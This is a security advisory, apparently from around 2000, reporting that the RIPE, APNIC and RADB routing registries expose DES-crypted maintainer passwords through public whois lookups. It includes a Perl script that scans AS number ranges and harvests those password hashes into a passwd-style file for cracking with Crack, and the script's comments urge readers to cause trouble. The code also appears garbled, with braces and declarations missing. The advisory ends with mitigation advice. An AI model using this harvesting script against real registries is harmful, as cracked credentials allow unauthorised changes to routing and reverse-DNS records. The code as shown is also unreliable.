RIPE, APNIC, RADB insecurities


    most unices


    Raju  Mathur  found  following.   The  Routing Registries maintain
    databases of all  routing information including  Autonomous System
    Numbers and IN.ADDR-ARPA reverse lookups.  The registries  display
    DES-encrypted passwords  to the  general public,  and the database
    update process is prone to being cracked.

    Raju  contacted  RIPE,  APNIC  and  RADB  on  25  November,  2000.
    Responses  indicate  that  the  database  format  and  information
    revealed were decided by the community and cannot be changed until
    the community as a whole votes to change them.

    If you are a maintainer for  an AS or an IN-ADDR.ARPA domain,  you
    can use any of the  following methods to update information  about
    your records (this is from my personal understanding, there  could
    be minor differences between different registries):

    1. NONE.  You send updates by e-mail or through a web form to  the
       registry, which are reviewed  by the hostmaster and  applied if
       they are syntatically and semantically OK.
    2. MAIL-FROM.  You send updates by e-mail or through the web  form
       to the  registry, which  makes syntax  and semantic  checks and
       contacts  you  on  your  registered  e-mail  address.  Once you
       reply in the affirmative, the updates are applied.
    3. CRYPT-PW.   The  web  forms  allow  you  to apply  semantically
       correct  updates  immediately  if  you  choose CRYPT-PW as your
       authentication method.  You  only need your password  to change
       the database.  There is no human review of the update.
    4. PGP.   You send  a PGP-signed  message to  the hostmaster,  who
       verifies  that  the  signature  is  correct,  makes  syntax and
       semantic checks and updates the database.

    We are not going to go into problems associated with MAIL-FROM and
    NONE  authentication  methods  since  (a)  they  have already been
    thrashed out in the context of the domain registries and (b)  they
    require human intervention  at some point.   PGP also seems  quite
    safe (as safe as using PGP is).

    The CRYPT-PW method  of update is  of interest here.   Essentially
    anyone who manages to get  hold of your plaintext CRYPT-PW  (which
    uses DES as the encryption method) can masquerade as you and  make
    changes to the databases  without any other human  intervention at
    all.  This can lead to serious security and network outage  issues
    in  the  short   term.   So  far   Raju  thought  that   long-term
    implications were minimal since  the original maintainer would  be
    notified about rogue changes, but  we are not too sure  about what
    happens if you change the maintainers contact address also.

    The problem is that the registries are constrained by their  users
    to reveal the  CRYPT'ed password to  the general public  through a
    simple whois mechanism.   Doing a whois  on the maintainer  object
    in  a  registry  reveals  the  CRYPT'ed  password if s/he has one,
    after which there are any  number of tools which would  permit you
    to attempt to crack or brute-force the password.

    Exploit?   Not really  an exploit,  but the  attached Perl  script
    (which has  been tested  on Linux  with fwhois)  will help  you to
    extract DES-encrypted  passwords from  maintainer objects  related
    to a range of Autonomous System Numbers (ASN's) and put them  into
    a Unix-style password  file which can  be fed to  Crack & co.  for
    further ``processing''.

    Run it as: output-file APNIC|RIPE start-asn end-asn

    where  output-file  will  be  the  file with the Unix-style passwd
    information including  the encrypted  password, APNIC  or RIPE are
    which registry you wish to  glean passwords from (it's trivial  to
    modify the program  to glean passwords  from RADB) and  start- and
    end-asn's define the block of AS numbers whose maintainer  objects
    you are trying to to extract passwords from.

    To download exploit, go to:

    The code:

    #!/usr/bin/perl -w
    # Brute force create a /etc/passwd-like file with DES-encrypted passwords
    # from dumb whois lookups on RIPE and APNIC.  Can be easily modified
    # to handle RADB too.  Once the file is created, run Crack (or your favourite
    # DES-crack program) on it and create some headache for the ``Internet
    # community'' which has decided to reveal DES-encoded passwords as part
    # of a whois lookup on a maintainer object.
    # Copyright 2000, Raju Mathur <>, <>
    # This program is available under the terms of the GNU General Public License
    use strict ;
    # Currently will work on RIPE and APNIC
      $count = 0 ;
      $outfile = shift ;
      $registry = shift ;
    if ( !defined $outfile || !defined $registry
         || $registry !~ /apnic/i && $registry !~ /ripe/i )
      print STDERR "usage: $0 output-file APNIC|RIPE [start AS] [end AS]\n" ;
      exit 1 ;
    open OUT , ">$outfile"
      or die "Cannot write to $outfile: $!\n" ;
      $startas = shift ;
    $startas = 1
      if !defined $startas ;
      $endas = shift ;
    $endas = 12000
      if !defined $endas ;
      $server = "" ;
    $server = ""
      if $registry =~ /ripe/i ;
      $maintainer ;
      $descr ;
      $notify ;
      $auth ;
      $passwd ;
    foreach my $i ( $startas..$endas )
      print "*** AS$i\n" ;
      open WHOIS , "whois AS$i\@$server|"
        or die "Cannot whois AS$i: $!\n" ;
      while ( <WHOIS> )
        if ( /^mnt-by:\s*(.*)/ )
          $maintainer = $1 ;
          last ;
      close WHOIS ;
        if !$maintainer ;
      print "*** $maintainer\n" ;
      open WHOIS , "whois $maintainer\@$server|"
        or die "Cannot whois $maintainer: $!\n" ;
      $descr = "" ;
      while ( <WHOIS> )
        if ( $_ =~ /^descr:\s*(.*)/ )
          $descr .= "$1, " ;
        if ( $_ =~ /^mnt-nfy:\s*(.*)/ )
          $notify = $1 ;
        if ( $_ =~ /^auth:\s*(.*)/ )
          $auth = $1 ;
        last if $auth && $auth =~ /crypt-pw/i ;
        if !$auth || $auth !~ /crypt-pw/i ;
    print "*** <$descr> <$notify> <$auth>\n" ;
      close WHOIS ;
      $auth =~ /.*crypt-pw\s*(.*)/i ;
      $passwd = $1 ;
      $descr =~ s/[\n:]//g ;
      $notify =~ s/://g ;
      print OUT "$maintainer:$passwd:42:42:$descr:/dev/null:/bin/sh\n" ;
      $auth = "" ;
      $count++ ;
    close OUT ;
    print "$count records\n" ;


    Solutions exist at a number of levels:
    1. Personal.  Do not use CRYPT-PW as your authentication mechanism
       if you are a maintainer.  All the registries recommend the  use
       of PGP and will help you get started with PGP if you need that.
    2. Community.  Take a  decision not to display the  authentication
       mechanism  to  the  general  public,  especially  the encrypted
       passwords.   It should  be trivial  to change  the whois server
       code to conceal the passwords.
    3. Registry.  Encourage all your users to switch to a more  secure
       method of sending  updates.  Define  a date by  which all users
       must  switch.   Remove   the  ``NONE''  authentication   method
       altogether.  For MAIL-FROM  use unique, random identifiers  for
       each request which must  be present in the  update confirmation